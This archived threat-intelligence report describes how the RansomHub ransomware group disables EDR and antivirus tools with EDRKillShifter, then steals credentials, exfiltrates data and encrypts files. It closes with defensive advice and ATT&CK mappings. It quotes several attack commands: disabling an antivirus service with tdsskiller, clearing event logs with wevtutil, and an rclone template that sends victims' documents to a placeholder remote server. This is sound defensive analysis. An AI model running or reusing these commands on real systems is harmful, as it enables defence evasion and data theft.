{ "id": "12b427b1-7d93-43e6-bdd3-bcd9e68c07fc", "created_at": "2026-04-06T00:21:33.714751Z", "updated_at": "2026-04-10T13:12:10.29504Z", "deleted_at": null, "sha1_hash": "f2a01ee1d220f3af6c240fad7832a48e7d42e789", "title": "How Ransomhub Ransomware Uses EDRKillShifter to Disable EDR and Antivirus Protections", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2074790, "plain_text": "How Ransomhub Ransomware Uses EDRKillShifter to Disable\r\nEDR and Antivirus Protections\r\nPublished: 2024-09-20 · Archived: 2026-04-05 15:01:29 UTC\r\nHighlights:\r\nThe group, Trend Micro tracked this group as Water Bakunawa, behind the RansomHub ransomware\r\nemploys various anti-EDR techniques to play a high-stakes game of hide and seek with security solutions.\r\nThe RansomHub ransomware’s attack chain includes exploiting the Zerologon vulnerability (CVE-2020-\r\n1472). Left unpatched, it can enable threat actors to take control of an entire network without needing\r\nauthentication.\r\nRansomHub has been attributed to ransomware attacks on the following industries and critical\r\ninfrastructure sectors: water and wastewater, IT, commercial and government services and facilities,\r\nhealthcare, agriculture, financial services, manufacturing, transportation, and communications.\r\nTrend Micro analysts and experts found corroborating evidence of multiple spear-phishing attempts,\r\nindicating that the ransomware attacks are targeted. They have been known to threaten organizations\r\nthey’ve successfully targeted, demanding ransom payments in exchange for not releasing the compromised\r\nfiles to the public.\r\nRansomHub is notable for its affiliate model and for using techniques to disable or terminate endpoint detection\r\nand response (EDR) to evade detection and prolong its presence within compromised systems or networks. Due to\r\nthe recent discovery of our threat hunting team regarding Ransomhub's new evasion technique: the integration of\r\nthe EDRKillShifter within its attack chain. We were able to investigate a recent incident from Trend Micro’s\r\nVision One telemetry data.\r\nEDRKillShifter is designed to exploit vulnerable drivers, undermining the effectiveness of EDR solutions by\r\nemploying techniques to evade detection and disrupt security monitoring processes. In addition, EDRKillShifter\r\nenhances persistence mechanisms by employing techniques that ensure its continuous presence within the system,\r\neven after initial compromises are discovered and cleaned. It dynamically disrupts security processes in real-time\r\nand adapts its methods as detection capabilities evolve, staying a step ahead of traditional EDR tools. Seamlessly\r\nintegrated into the entire attack chain, EDRKillShifter ensures that all phases of an attack benefit from its EDR-disabling functionalities, increasing overall effectiveness. These advancements make EDRKillShifter a formidable\r\ntool against conventional endpoint security solutions, necessitating the adoption of more robust and adaptive\r\nsecurity measures by organizations.\r\nOver the past months, the cybercriminals behind the RansomHub ransomwareopen on a new tab have gained\r\nsignificant notoriety. The FBI’s advisoryopen on a new tab in August reported that it has successfully targeted 210\r\norganizations across a range of industries and critical infrastructure sectors, including IT, government services,\r\nhealthcare, agriculture, financial services, transportation, and communications.\r\nhttps://www.trendmicro.com/en_us/research/24/i/how-ransomhub-ransomware-uses-edrkillshifter-to-disable-edr-and-.html\r\nPage 1 of 19\n\nIn this article, we take a closer look into how RansomHub uses EDRKillShifter in its attack chain and how it\r\ndisrupts traditional defense mechanisms. Insights into these techniques can help cybersecurity professionals\r\nanticipate RansomHub’s strategies and other threats that might employ similar TTPs.\r\nThe advanced features of Trend Micro's Vision One have been instrumental in uncovering these tactics. Vision\r\nOne's comprehensive telemetry and advanced analytical capabilities have allowed us to dissect and understand the\r\nsophisticated methods employed by RansomHub. With Vision One’s insights, we have been able to map out its\r\ntactics, techniques, and procedures (TTPs) as well as its operational methods and impact on cybersecurity\r\ndefenses.\r\nRansomHub’s infection chain\r\nFigure 1 illustrates the infection chain of the RansomHub ransomware, detailing the stages from initial access to\r\ndata exfiltration and ransom demand.\r\nInitial access: RansomHub typically achieves initial access by targeting internet-facing systems and user\r\nendpoints through methods such as phishing emails, exploitation of known vulnerabilities, and password-spraying\r\nattacks. In a particular incident that we analyzed, we found that a single compromised user account was primarily\r\nresponsible for most malicious activities, indicating that it was the principal entry point for the attack. This is\r\ncorroborated by evidence of multiple spear phishing attempts that we identified during our analysis. With\r\ntelemetry data from Vision One, we also identified another potential access vector: the Zerologon vulnerability\r\n(CVE-2020-1472), which has also been observed in an unrelated incident.\r\nFigure 2. Multiple detections indicating a possible spear phishing attack\r\nhttps://www.trendmicro.com/en_us/research/24/i/how-ransomhub-ransomware-uses-edrkillshifter-to-disable-edr-and-.html\r\nPage 2 of 19\n\nhttps://www.trendmicro.com/en_us/research/24/i/how-ransomhub-ransomware-uses-edrkillshifter-to-disable-edr-and-.html\r\nPage 3 of 19\n\nFigure 3. Detections via Vision One and indicating abuse of elevation control mechanism\r\nEvasion: In this specific incident, we have identified that RansomHub employed four batch script files as a means\r\nof evasion. The batch script files observed were named “232.bat”, “tdsskiller.bat”, “killdeff.bat”, and\r\n“LogDel.bat”:\r\n232.bat employs a brute-force attack technique known as password spraying and disables Windows Defender’s\r\nreal-time monitoring feature.\r\nFigure 4. 232.bat performing brute force\r\nFigure 5. 232.bat disabling Windows Defender’s real-time monitoring feature\r\nhttps://www.trendmicro.com/en_us/research/24/i/how-ransomhub-ransomware-uses-edrkillshifter-to-disable-edr-and-.html\r\nPage 4 of 19\n\nThe tdsskiller.bat batch script’s function is to modify the Windows Registry to set the default shell program to\r\nexplorer.exe for users logging into the system. It also forcibly terminates a set of processes based on their image\r\nnames utilizing a combination of filters and wildcards.\r\nFigure 6. Modification of HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\r\nFigure 7. Utilization of the taskkill utility to terminate running processes in Windows\r\nIt also uses “C:\\Windows\\tdsskiller.exe” to disable an antivirus service using the command “-dcsvc\r\n\"TMBMServer\" -accepteula”. The parameter -dcsvc \"TMBMServer\" specifically targets the TMBMServer\r\nservice, which is a Trend Micro service known as Trend Micro Unauthorized Change Prevention Service,\r\ninstructing the TDSSKiller utility to disable it. The addition of -accepteula indicates that the end-user license\r\nagreement (EULA) was automatically accepted, allowing the command to execute without additional prompts.\r\nThis action deactivates the designated antivirus service, which compromises the system's security.\r\nhttps://www.trendmicro.com/en_us/research/24/i/how-ransomhub-ransomware-uses-edrkillshifter-to-disable-edr-and-.html\r\nPage 5 of 19\n\nhttps://www.trendmicro.com/en_us/research/24/i/how-ransomhub-ransomware-uses-edrkillshifter-to-disable-edr-and-.html\r\nPage 6 of 19\n\nFigure 8. Vision One detection of tdsskiller disabling an antivirus service\r\nMeanwhile, killdeff.bat has an obfuscated command, which is an obfuscated PowerShell script designed to toggle\r\nWindows Defender settings for malicious purposes. It includes various stages of execution that manipulate\r\nregistry entries, alter Windows Defender and notification settings, and attempt privilege escalation. The script\r\nemploys sophisticated techniques such as obfuscated inline expressions, environment-variable readings, and\r\nconditional logic to enable or disable Windows Defender’s features and suppress notifications. Additionally, it\r\nincludes user interaction prompts to decide on enabling or disabling Windows Defender. It abuses low-level\r\ninteractions with system processes to elevate privileges to bypass UAC.\r\nhttps://www.trendmicro.com/en_us/research/24/i/how-ransomhub-ransomware-uses-edrkillshifter-to-disable-edr-and-.html\r\nPage 7 of 19\n\nFigure 9. killdeff.bat’s obfuscated PowerShell command\r\nWe observed LogDel.bat making suspicious changes to system files and settings. The script specifically altered the\r\nattributes of the Default.rdp file by executing the command, “attrib Default.rdp -s -h”, removing the system and\r\nhidden attributes to make the file more accessible for potential tampering. Additionally, LogDel.bat was found to\r\nhave the capability to modify the Windows registry key at\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers, potentially altering Remote\r\nDesktop Protocol (RDP) settings to facilitate unauthorized remote access.\r\nFigure 10. The command used to remove system and hidden attributes of Default.rdp via Attrib.exe\r\nhttps://www.trendmicro.com/en_us/research/24/i/how-ransomhub-ransomware-uses-edrkillshifter-to-disable-edr-and-.html\r\nPage 8 of 19\n\nOf further concern is the script’s capability to clear Windows Event Logs using wevtutil, thereby erasing tracks of\r\nany malicious activities and hindering forensic investigations.\r\nFigure 11. LogDel.bat executing wevtutil.exe to execute the command “wevtutil.exe cl\r\n\"Application\"”\r\nEDRKillShifter: In this part, we will dive into the analysis of EDRKILLShifter from our threat hunting team.\r\nThe EDRKillShifter tool functions as a “loader” executable, serving as a delivery mechanism for a legitimate\r\nhttps://www.trendmicro.com/en_us/research/24/i/how-ransomhub-ransomware-uses-edrkillshifter-to-disable-edr-and-.html\r\nPage 9 of 19\n\ndriver that is susceptible to abuse to terminate applications related to antivirus solutions. This type of tool is often\r\nreferred to as a “bring your own vulnerable driver” (BYOVD) tool. The execution process of this loader involves\r\nthree primary steps. Initially, the attacker must run EDRKillShifter using a command line that includes a password\r\nstring.\r\nFigure 12. Execution of EDRKillShifter with the “-pass” argument\r\nWhen executed with the correct password, the executable decrypts an embedded resource named \"data.bin” and\r\nexecutes it in memory. The data.bin code unpacks and executes the final payload. This payload then deploys and\r\nexploits the vulnerable legitimate drivers to acquire sufficient privileges to disengage an EDR tool’s protection.\r\nFigure 13. data.bin file created\r\nOnce the contents of data.bin has been decrypted, it will proceed in executing the code. The second-stage payload\r\nwill then decrypt the final payload which contains the Gobinary and the vulnerable driver.\r\nFigure 14. EDRKillShifter dropping the vulnerable driver\r\nThe list of applications that EDRKillShifter can terminate can be found in the IoC text file linked at the end of the\r\narticle.\r\nhttps://www.trendmicro.com/en_us/research/24/i/how-ransomhub-ransomware-uses-edrkillshifter-to-disable-edr-and-.html\r\nPage 10 of 19\n\nFigure 15. EDRKillShifter (svc.exe) creates a Windows service named KB20240815\r\nCredential access: Ransomhub escalates its attack by employing Task Manager to dump credentials from the\r\nLocal Security Authority Subsystem Service (LSASS) memory. This technique allows the ransomware to extract\r\nsensitive credentials, opening the door to deeper and more damaging breaches. By gaining access to these critical\r\ncredentials, Ransomhub can amplify its highly intrusive attacks and complicate recovery efforts.\r\nhttps://www.trendmicro.com/en_us/research/24/i/how-ransomhub-ransomware-uses-edrkillshifter-to-disable-edr-and-.html\r\nPage 11 of 19\n\nFigure 16. Taskmgr.exe creating a file named lsass.DMP\r\nDiscovery: Ransomhub ramps up its attack by deploying the NetScan tool for covert network reconnaissance.\r\nUsing the lateral tool transfer technique (T1570), they sneak NetScan into the victim’s system via the RDP buffer.\r\nThis tactic allows RansomHub to map out the victim’s network, laying the groundwork for targeted attacks and\r\neven more severe breaches.\r\nhttps://www.trendmicro.com/en_us/research/24/i/how-ransomhub-ransomware-uses-edrkillshifter-to-disable-edr-and-.html\r\nPage 12 of 19\n\nFigure 17. Execution of Netscan.exe\r\nLateral movement:\r\nBy employing the Lateral Tool Transfer technique, the attackers stealthily moved malicious tools between\r\nsystems. They then used SMB/Windows Admin Shares to remotely connect and execute commands. Central to\r\ntheir strategy was the use of the NetScan tool to pinpoint and map network endpoints, allowing for precise and\r\nefficient lateral movements throughout the network.\r\nhttps://www.trendmicro.com/en_us/research/24/i/how-ransomhub-ransomware-uses-edrkillshifter-to-disable-edr-and-.html\r\nPage 13 of 19\n\nFigure 18. RansomHub utilizing NetScan for discovery and employing the Lateral Tool Transfer\r\ntechnique\r\nCommand and control: RansomHub utilized the remote access tool AnyDesk as their command-and-control\r\n(C\u0026C) infrastructure. AnyDesk, typically used for legitimate remote support and connectivity, was repurposed by\r\nthe attackers to maintain control over compromised systems. Through AnyDesk, they executed commands,\r\nexfiltrated sensitive data, and orchestrated lateral movements across the network.\r\nhttps://www.trendmicro.com/en_us/research/24/i/how-ransomhub-ransomware-uses-edrkillshifter-to-disable-edr-and-.html\r\nPage 14 of 19\n\nFigure 19. RansomHub installing AnyDesk.exe\r\nExfiltration: The threat actors employ the command-line tool “rclone” to steal sensitive files from the\r\ncompromised network. This tactic aligns with MITRE ATT\u0026CK technique T1041, Exfiltration Over C2 Channel,\r\nwhere data is transferred out of the network to a remote location under the attackers’ control.\r\nLet’s take this command as an illustration:\r\nrclone copy \\\\\u003cCOMPROMISED_IP\u003e\\i$ \u003cREMOTE_SERVER\u003e:\u003cREMOTE_PATH\u003e\\Users --include \".pdf\" --\r\ninclude \".docx\" --include \".sql\" --max-age \u003cDATE\u003e\r\n\u003cCOMPROMISED_IP\u003e represents the IP address of the targeted system, while \u003cREMOTE_SERVER\u003e:\r\n\u003cREMOTE_PATH\u003e refers to the location where the exfiltrated data is sent, and \u003cDATE\u003e specifies a cutoff date\r\nfor file modification. This command selectively targets valuable file types, such as documents and databases, and\r\ntransfers them to a remote server. The attackers use these exfiltrated files as leverage, threatening their owners to\r\nrelease them publicly if the ransom is not paid.\r\nImpact: After executing RansomHub’s TTPs, the ransomware binary is subsequently deployed. To successfully\r\nexecute the ransomware binary with EDRKillShifter , a predefined password key must be provided using the\r\nparameter “-pass”.\r\nFigure 20. RansomHub binary with the -pass argument\r\nUpon successful execution, RansomHub proceeds to encrypt files, appending an extension that depends on the file\r\nname of the ransom note. In this incident, the ransom note has a file name of “README_1d7fdb.txt”.\r\nhttps://www.trendmicro.com/en_us/research/24/i/how-ransomhub-ransomware-uses-edrkillshifter-to-disable-edr-and-.html\r\nPage 15 of 19\n\nFigure 21. Ransom note example\r\nAs Figure 21 shows, the encrypted file has a file extension of “.1d7fdb,” whose name, as mentioned, depends on\r\nthe ransom notes’ file name. This indicates the successful encryption of the file.\r\nFigure 22. File encrypted by RansomHub\r\nAdditionally, the RansomHub binary has the capability to delete all existing Volume Shadow Copy Service (VSS)\r\nsnapshots on a Windows system via vssadmin.exe without prompting for any confirmation.\r\nFigure 23. Deletion of Shadow Copies via vssadmin.exe\r\nRansomHub’s attack chain highlights a growing trend in ransomware operations, where attackers increasingly rely\r\non advanced tools like EDRKillShifter to bypass security defenses. This underscores the need for a multilayered\r\ndefense strategy that combines forward-looking technology with proactive threat intelligence. As ransomware\r\ngroups adopt similar anti-EDR tactics, enhancing resilience and adapting security strategies will be crucial to\r\nsafeguarding digital assets.\r\nSecurity recommendations for RansomHub\r\nTo defend against the evolving threat of RansomHub, organizations should adopt a comprehensive security\r\nstrategy:\r\nStrengthen endpoint protection systems. Ensure that your EDR solutions are equipped with the latest threat\r\nintelligence to detect new and evolving ransomware techniques. Behavioral analysis and heuristic scanning help\r\ndetect unusual activity or anomalous behaviors that may signal attempts to execute ransomware. Restrict access to\r\nendpoints based on continuous verification to limit lateral movement. Endpoint isolation and rollback capabilities\r\ncan also help mitigate potential attacks.\r\nTrend Micro’s Apex Oneproducts, for example, provides multilayered protection with advanced threat detection\r\nand response capabilities, using behavioral analysis and machine learning to detect and mitigate threats. Trend\r\nMicro’s XDRproducts provides comprehensive threat visibility and expert analytics across email, endpoints,\r\nservers, cloud workloads, and networks.\r\nImplement driver- and kernel-level protections. These security mechanisms help prevent unauthorized access\r\nand manipulation of system drivers, a tactic employed by RansomHub. There are also tools and technologies that\r\ncan safeguard against the execution of malicious or unsigned drivers. Ensure that only trusted code runs within the\r\nkernel space, and regularly monitor kernel-level activities to detect suspicious behavior and see if security tools\r\nthemselves are protected from tampering.\r\nhttps://www.trendmicro.com/en_us/research/24/i/how-ransomhub-ransomware-uses-edrkillshifter-to-disable-edr-and-.html\r\nPage 16 of 19\n\nTrend Micro’s Deep Securityproducts has an integrity-monitoring feature that ensures that only signed and\r\nverified drivers are allowed, preventing unauthorized or malicious drivers from being loaded. Deep Security also\r\nhas a virtual patchingnews article capability that provides immediate protection against newly discovered\r\nvulnerabilities in drivers before official patches are applied.\r\nEnforce credential and authentication security. Enable multifactor authentication (MFA) across all access\r\npoints, regularly update passwords, and monitor for any signs of credential misuse. Limit access based on roles to\r\nreduce exposure and ensure that authentication systems are regularly audited for vulnerabilities to prevent\r\nunauthorized access.\r\nThe Trend Micro Password Manager for instance, enforces the use of strong, complex passwords and regular\r\npassword rotations across all systems to reduce the risk of unauthorized access to systems requiring elevated\r\nprivileges.\r\nEnable behavioral monitoring and anomaly detection. These security mechanisms continuously analyze\r\npatterns of normal behavior to flag deviations that could indicate ransomware or other malicious activities.\r\nDetecting anomalies early, such as unauthorized file encryption or lateral movement within the network, allows\r\nfor a swift response before major damage occurs. Combining real-time monitoring with automated alerts and\r\nanalysis significantly enhances your ability to detect threats like RansomHub in their early stages.\r\nApex One, for example, has behavior monitoring capabilities to detect and block malicious activities such as\r\nunauthorized file modifications or memory allocation anomalies. Trend Micro’s Managed XDR servicesservices\r\naugments threat and anomaly detection with expert analysis and 24/7 monitoring across email, endpoints, servers,\r\ncloud workloads, and networks.\r\nHarden the endpoints’ security configurations. Apply strict access controls, disable unnecessary services, and\r\nensure that all systems are regularly patched and updated. Standardize security settings across devices and\r\nregularly audit endpoint configurations to identify and address weaknesses or vulnerabilities before they can be\r\nexploited.\r\nDeep Security has an application control feature that allows only verified and authorized applications while\r\nblocking unauthorized executables. The Trend Micro Apex Central solution enforces the principle of least\r\nprivilege by ensuring that applications and users have only the permissions necessary for their respective\r\nfunctions.\r\nTrend Micro Vision One Threat Intelligence\r\nTo stay ahead of evolving threats, Trend Micro customers can access a range of Intelligence Reports and Threat\r\nInsights within Trend Micro Vision One. Threat Insights helps customers stay ahead of cyber threats before they\r\nhappen and better prepared for emerging threats. It offers comprehensive information on threat actors, their\r\nmalicious activities, and the techniques they use. By leveraging this intelligence, customers can take proactive\r\nsteps to protect their environments, mitigate risks, and respond effectively to threats.\r\nTrend Micro Vision One Intelligence Reports App [IOC Sweeping]\r\nRansomHub Attacks Surge: New Anti-EDR Tactics Unveiled and AMADEY Infrastracture Connection\r\nhttps://www.trendmicro.com/en_us/research/24/i/how-ransomhub-ransomware-uses-edrkillshifter-to-disable-edr-and-.html\r\nPage 17 of 19\n\nTrend Micro Vision One Threat Insights App\r\n               Threat Actor/s: Water Bakunawa\r\n               Emerging Threats: RansomHub Ramps Up: New Anti-EDR Tactics Unveiled and AMADEY\r\nInfrastructure Connection\r\nHunting Queries\r\nTrend Micro Vision One Search App\r\nTrend Micro Vision One customers can use the Search App to match or hunt the malicious indicators mentioned in\r\nthis blog post with data in their environment.   \r\nEDRKILLSHIFT Detection\r\nmalName:(\"*EDRKILLSHIFT*\") AND eventName:MALWARE_DETECTION\r\nMore hunting queries are available for Vision One customers with Threat Insights Entitlement enabledproducts.\r\nIndicators of Compromise (IoCs):\r\nThe full list of IOCs can be found here. \r\nMITRE ATT\u0026CK® techniques\r\nTactic Technique ID\r\nInitial Access\r\nValid Accounts: Domain Accounts T1078.002\r\nExploitation of Remote Services T1210\r\nExecution Service Execution T1569.002\r\nPrivilege\r\nEscalation\r\nAbuse Elevation Control Mechanism: Bypass User Account Control T1548.002\r\nDefense Evasion\r\nImpair Defenses: Disable or Modify Tools T1562.001\r\nhttps://www.trendmicro.com/en_us/research/24/i/how-ransomhub-ransomware-uses-edrkillshifter-to-disable-edr-and-.html\r\nPage 18 of 19\n\nFile and Directory Permissions Modification: Windows File and\r\nDirectory Permissions Modification\r\nT1222.001\r\nIndicator Removal: Clear Windows Event Logs T1070.001\r\nImpair Defenses: Safe Mode Boot T1562.009\r\nCredential\r\nAccess\r\nBrute Force T1110\r\n \r\nOS Credential Dumping T1003\r\nOS Credential Dumping: LSASS Memory T1003.001\r\nExfiltration Exfiltration to Cloud Storage T1567.002\r\nDiscovery Network Service Discovery T1046\r\nLateral\r\nMovement\r\nRemote Services: SMB/Windows Admin Shares T1021.002\r\nImpact\r\nData Encrypted for Impact T1486\r\nInhibit System Recovery T1490\r\nCredential\r\nAccess\r\nBrute Force T1110\r\nOS Credential Dumping T1003\r\nSource: https://www.trendmicro.com/en_us/research/24/i/how-ransomhub-ransomware-uses-edrkillshifter-to-disable-edr-and-.html\r\nhttps://www.trendmicro.com/en_us/research/24/i/how-ransomhub-ransomware-uses-edrkillshifter-to-disable-edr-and-.html\r\nPage 19 of 19", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "MISPGALAXY" ], "origins": [ "web" ], "references": [ "https://www.trendmicro.com/en_us/research/24/i/how-ransomhub-ransomware-uses-edrkillshifter-to-disable-edr-and-.html" ], "report_names": [ "how-ransomhub-ransomware-uses-edrkillshifter-to-disable-edr-and-.html" ], "threat_actors": [ { "id": "1b1271d2-e9a2-4fc5-820b-69c9e4cfb312", "created_at": "2024-06-07T02:00:03.998431Z", "updated_at": "2026-04-10T02:00:03.64336Z", "deleted_at": null, "main_name": "RansomHub", "aliases": [], "source_name": "MISPGALAXY:RansomHub", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "946af10b-32da-4f40-90fd-907ac77b0ea1", "created_at": "2025-08-07T02:03:24.905578Z", "updated_at": "2026-04-10T02:00:03.835556Z", "deleted_at": null, "main_name": "GOLD HUBBARD", "aliases": [ "Water Bakunawa " ], "source_name": "Secureworks:GOLD HUBBARD", "tools": [ "RansomHub" ], "source_id": "Secureworks", "reports": null }, { "id": "75108fc1-7f6a-450e-b024-10284f3f62bb", "created_at": "2024-11-01T02:00:52.756877Z", "updated_at": "2026-04-10T02:00:05.273746Z", "deleted_at": null, "main_name": "Play", "aliases": null, "source_name": "MITRE:Play", "tools": [ "Nltest", "AdFind", "PsExec", "Wevtutil", "Cobalt Strike", "Playcrypt", "Mimikatz" ], "source_id": "MITRE", "reports": null }, { "id": "7de82e85-4e62-4756-8584-e11f13618dc8", "created_at": "2026-01-23T02:00:03.292885Z", "updated_at": "2026-04-10T02:00:03.932027Z", "deleted_at": null, "main_name": "Water Bakunawa", "aliases": [], "source_name": "MISPGALAXY:Water Bakunawa", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434893, "ts_updated_at": 1775826730, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/f2a01ee1d220f3af6c240fad7832a48e7d42e789.pdf", "text": "https://archive.orkl.eu/f2a01ee1d220f3af6c240fad7832a48e7d42e789.txt", "img": "https://archive.orkl.eu/f2a01ee1d220f3af6c240fad7832a48e7d42e789.jpg" } }